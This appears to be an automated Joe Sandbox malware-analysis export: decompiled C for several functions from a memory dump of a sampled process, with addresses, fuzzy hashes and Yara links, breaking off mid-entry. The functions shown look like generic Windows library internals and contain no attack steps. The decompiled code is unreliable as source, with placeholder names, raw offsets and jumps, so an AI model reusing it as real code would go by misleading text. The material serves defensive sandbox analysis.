Instruction Fuzzy Hash: F941B171A40228ABDB21DF64C940BEAB7B4EF45740F4501A9E908AB350FB74FE85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 045F8A0A Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E045F8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x46dd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0462B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E045FE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x45c1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E04611DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E04623C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E045F8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x045f8a0a
0x045f8a1c
0x045f8a23
0x045f8a2e
0x045f8a30
0x045f8a36
0x045f8a3c
0x045f8a3e
0x045f8a4a
0x045f8a52
0x045f8a9c
0x045f8aae
0x045f8a58
0x045f8a5e
0x045f8a6a
0x045f8a6f
0x045f8a75
0x045f8a7d
0x045f8a85
0x045f8a86
0x045f8a89
0x045f8a93
0x045f8a99
0x045f8a9b
0x00000000
0x045f8aaf
0x045f8abe
0x045f8ac3
0x045f8acb
0x045f8ad7
0x045f8ae0
0x045f8af1
0x00000000
0x045f8af1
0x045f8acd
0x045f8ad5
0x045f8afb
0x045f8afd
0x045f8aff
0x045f8b07
0x045f8b22
0x045f8b24
0x045f8b2a
0x045f8b2e
0x045f8b3f
0x045f8b78
0x045f8b41
0x045f8b52
0x045f8b54
0x045f8b5c
0x045f8b74
0x045f8b74
0x045f8b5c
0x045f8b3f
0x045f8b5e
0x045f8b61
0x045f8b64
0x045f8b64
0x045f8b6c
0x045f8b6c
0x045f8b11
0x04649cd5
0x04649cd5
0x045f8b17
0x045f8b1a
0x045f8b1a
0x00000000
0x045f8ad5
0x045f8a89

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2d8591fff9108a125ebd9e9cbc8a8111e49704e6c95bb214f42d284a218f59c
Instruction ID: b5ce52939922de02bd4a2e9988dd3e08832e7ef9acf36da90e7d38b8132cf152
Opcode Fuzzy Hash: f2d8591fff9108a125ebd9e9cbc8a8111e49704e6c95bb214f42d284a218f59c
Instruction Fuzzy Hash: C74194B1A4022C9BDB24EF15DC88AAAB3F4FF44310F1045E9D91997251E770AE84DF51

Uniqueness

Uniqueness Score: -1.00%

Function 046AAA16 Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E046AAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E046AABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E046AAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E046AAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0468CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L046077F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E04607D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E046A131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0468CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x046aaa1f
0x046aaa21
0x046aaa23
0x046aaa2b
0x046aaa30
0x046aaa36
0x046aaa39
0x046aaa42
0x046aaa75
0x046aaa7a
0x046aaa7c
0x046aaa7c
0x046aaa88
0x046aaa8a
0x046aaa8f
0x046aab02
0x046aab04
0x046aaa99
0x046aaaa8
0x046aaaaf
0x046aaab3
0x046aaacc
0x046aaad1
0x046aaad6
0x046aaae0
0x046aaaf3
0x046aaaf9
0x046aaafe
0x046aaafe
0x046aaaf3
0x046aaad6
0x046aaab3
0x046aab07
0x046aab0a
0x046aab11
0x046aab23
0x046aab13
0x046aab1c
0x046aab1c
0x046aab2b
0x046aab44
0x046aab44
0x046aab51
0x046aab51
0x046aaa44
0x046aaa47
0x046aaa4c
0x00000000
0x00000000
0x046aaa5a
0x046aaa64
0x046aaa72
0x00000000
0x046aaa66
0x046aaa66
0x046aaa68
0x046aaa6a
0x00000000
0x046aaa6a

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: 69d13376f46786aefc44bbdce63d8f275ab3dc09743acf2fbe9912b800686a2d
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: AD31D531B009046BEB159BA9C945BBFF7AADF84311F05806FE805A7391FA74AD18CA50

Uniqueness

Uniqueness Score: -1.00%

Function 046AFDE2 Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E046AFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E046AFD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E046B0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E04607D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E046A1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E046B2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E046AC8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E046ADBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E04607D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E046AA80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x046afde7
0x046afde8
0x046afdec
0x046afdee
0x046afdf5
0x046afdf7
0x046afdfc
0x046afe19
0x046afe22
0x046afe26
0x046afec6
0x046afecd
0x046afed5
0x046afee7
0x046afed7
0x046afee0
0x046afee0
0x046afeef
0x046aff00
0x046aff02
0x046aff07
0x046aff07
0x00000000
0x046afeef
0x046afe33
0x046afe55
0x046afe59
0x046afe5b
0x046afe5e
0x046afe69
0x046afe6d
0x046afe6d
0x046afe69
0x046afe35
0x046afe41
0x046afe41
0x046afe79
0x046afe8b
0x046afe7b
0x046afe84
0x046afe84
0x046afe93
0x00000000
0x046afea8
0x046afeba
0x00000000
0x046afeba
0x046afdfe
0x046afe01
0x046afe02
0x046afe08
0x046aff0c
0x046aff14
0x046aff14

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 8a49bbd8106c5a775339c4873a64e726deb38630e287cd9f107b4943b508c508
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: 2931F832300A40BFD32A9B68C844F6BBBE5FB85750F184459E4858B742FA75FC61CB55

Uniqueness

Uniqueness Score: -1.00%

Function 046AEA55 Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E046AEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E04602280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E046AE815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E045EF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E045FFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E046AAFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E046ABCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E04607D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0469FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E045FFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E046AA80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x046aea55
0x046aea66
0x046aea68
0x046aea6c
0x046aea6f
0x046aea72
0x046aea75
0x046aea7a
0x046aea7a
0x046aea7e
0x046aea80
0x046aea85
0x046aea8b
0x046aeab5
0x046aeabc
0x046aeabf
0x046aeabf
0x046aeaca
0x046aeace
0x046aead0
0x046aeae4
0x046aeaeb
0x046aeaf0
0x046aeaf5
0x046aeb09
0x046aeb0d
0x046aeb1d
0x046aeb2d
0x046aeb38
0x046aeb3d
0x046aeb41
0x046aeb4a
0x046aeb60
0x046aeb4c
0x046aeb52
0x046aeb59
0x046aeb59
0x046aeb68
0x046aeb71
0x046aeb71
0x046aea8d
0x046aea8f
0x046aea92
0x046aea97
0x046aea97
0x046aea9b
0x046aea9c
0x046aea9e
0x046aeaa6
0x046aeaa6
0x046aeb7e

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 9255159ee9871aa3b58be63faa431ebc643416df2e6f9cfc41371909dc44217a
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: FA319272604B05ABD719DF24C884A6BB7A9FBC0214F04892EE65687744EB31FC19CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 046669A6 Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E046669A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x46dd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L045F6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E04666BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E04629980() >= 0) {
							E04602280(_t56, 0x46d8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x46d8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x46d8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E045EB6F0(0x45cc338, 0x45cc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E04629520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E046295D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E045FFFB0(_t68, _t77, 0x46d8778);
				}
				_pop(_t78);
				return E0462B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x046669b5
0x046669be
0x046669c3
0x046669c9
0x046669cc
0x046669d1
0x046669d3
0x046669de
0x046669e1
0x046669ea
0x046669f6
0x046669fe
0x04666a13
0x04666a14
0x04666a15
0x04666a16
0x04666a1e
0x04666a26
0x04666a31
0x04666a36
0x04666a37
0x04666a40
0x04666a49
0x04666a4a
0x04666a53
0x04666a59
0x04666a5d
0x04666a5e
0x04666a64
0x04666a67
0x04666a6a
0x04666a6d
0x04666a70
0x04666a77
0x04666a7d
0x04666a86
0x04666a89
0x04666a9c
0x04666a9f
0x04666aa2
0x04666aa5
0x04666aaf
0x04666ab1
0x04666ab8
0x04666ab9
0x04666abb
0x04666abe
0x04666ac5
0x04666ac5
0x04666aaf
0x04666a40
0x04666a26
0x046669fe
0x04666ace
0x04666ad0
0x04666ad3
0x04666ad8
0x04666adf
0x04666adf
0x04666ae8
0x04666aef
0x04666aef
0x04666af9
0x04666b06

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eb09f8f5755949b1412bc6060b1d67f504a1503a134af97a9b19532b5f7491d
Instruction ID: 7f90fe0e078645eab4aecb6acf3b54587706e139a11a076ba4cc84d4f32b4ed2
Opcode Fuzzy Hash: 1eb09f8f5755949b1412bc6060b1d67f504a1503a134af97a9b19532b5f7491d
Instruction Fuzzy Hash: DD416AB1E01208AFDB24DFA5D940BFEBBF8FF48714F14812AE915A7240EB74A905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 045E5210 Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E045E5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E045E52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E046295D0();
							L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E045FEB70(_t54, 0x46d79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E046295D0();
								L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E045FEB70(_t54, 0x46d79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0462F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E045FEB70(_t54, 0x46d79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E046295D0();
							L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x045e5220
0x045e5224
0x04640d13
0x04640d16
0x04640d19
0x045e522a
0x045e522a
0x045e522d
0x045e522d
0x045e5231
0x045e5235
0x045e5239
0x04640d5c
0x04640d62
0x00000000
0x00000000
0x04640d6a
0x04640d7b
0x04640d7f
0x04640d81
0x04640d84
0x04640d95
0x04640d95
0x04640d6c
0x04640d71
0x04640d71
0x04640d9a
0x00000000
0x045e524a
0x045e524a
0x045e5250
0x04640d24
0x04640d35
0x04640d39
0x04640d3b
0x04640d3e
0x04640d50
0x04640d50
0x04640d26
0x04640d2b
0x04640d2b
0x00000000
0x04640d55
0x045e5256
0x045e525b
0x045e5265
0x04640da7
0x045e526b
0x045e526e
0x045e5272
0x04640db1
0x04640db4
0x04640dc5
0x04640dc5
0x045e5272
0x045e5278
0x045e527e
0x045e528a
0x045e528c
0x045e528d
0x00000000
0x045e5280
0x045e5282
0x045e5288
0x045e529f
0x045e5292
0x00000000
0x045e5292
0x00000000
0x045e5288
0x045e527e

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91793bf634b957b601b687d87d707dcf2adee2fc37651ef2765f3710ed723eeb
Instruction ID: ea4821135d9aa6e5c16d9efbaf507082d1aa6bdc4fbcc206fb934dff3584bd33
Opcode Fuzzy Hash: 91793bf634b957b601b687d87d707dcf2adee2fc37651ef2765f3710ed723eeb
Instruction Fuzzy Hash: 49314832751625EBCB29AF68CC41F3A77A5FF90768F104A1AE9154B2A1F730F804DA90

Uniqueness

Uniqueness Score: -1.00%

Function 04623D43 Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04623D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E045F7B60(0, _t61, 0x45c11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E045F7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L04604620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x04623d4c
0x04623d50
0x04623d55
0x04623d5e
0x0465e79a
0x00000000
0x0465e79a
0x04623d68
0x0465e789
0x04623d9d
0x04623da3
0x04623daf
0x04623db5
0x04623dbc
0x04623dc4
0x04623dc9
0x04623dce
0x0465e7ae
0x0465e7ae
0x04623dde
0x04623de2
0x04623de7
0x04623e0d
0x04623e13
0x04623e16
0x04623e1e
0x04623e25
0x04623e28
0x00000000
0x00000000
0x04623e2a
0x04623e2f
0x04623e37
0x04623e37
0x00000000
0x04623e37
0x04623e31
0x00000000
0x04623e31
0x04623e20
0x04623e20
0x04623e35
0x00000000
0x04623de9
0x04623de9
0x04623de9
0x04623dee
0x04623dfd
0x04623dff
0x04623e02
0x04623e05
0x04623e05
0x00000000
0x04623df0
0x04623de7
0x0465e78f
0x0465e794
0x04623d79
0x04623d84
0x04623d89
0x04623d8e
0x00000000
0x0465e7a4
0x04623d96
0x04623d9a
0x00000000
0x04623d9a
0x00000000
0x0465e794
0x04623d6e
0x04623d73
0x00000000
0x0465e7b5
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbb0c86739d2895bc310685ab4b444009bca00cc8f11601ff8b4b145114d2d97
